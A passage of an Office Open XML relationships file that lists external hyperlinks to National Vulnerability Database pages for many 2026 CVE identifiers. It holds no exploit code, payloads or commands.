Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86550" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86597" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86726" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86731" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12230" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33388" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70582" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72947" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76931" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53639" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81824" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81904" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81994" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81997" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84942" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18090" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19872" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63523" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69642" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76002" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77654" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78738" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78741" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78742" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85484" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85485" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85630" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56101" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78216" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78230" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16004" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69304" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69382" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72978" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73310" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75809" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16005" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69559" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75811" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16006" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18023" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68874" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69317" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69349" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69372" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69393" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69416" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69507" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69552" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69569" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69572" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75808" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75810" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28584" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28596" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28617" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28633" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49883" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54611" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68842" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68843" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68852" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68873" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68881" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68886" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68895" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69288" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69294" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69303" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69308" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69315" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69318" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69321" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69339" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69344" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69345" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69351" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69353" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69367" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69369" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69376" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69390" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69403" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69453" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69531" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69554" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69568" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69609" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69618" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69672" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69674" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69684" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69741" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69770" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69794" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72937" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72945" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72964" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72966" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73004" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77488" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77492" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78506" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78513" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79910" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80160" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80162" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81387" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81390" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81391" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81392" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81393" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81394" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81395" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81399" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81400" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81401" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81958" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81977" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81978" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81982" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81984" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81991" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81993" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82001" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83949" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 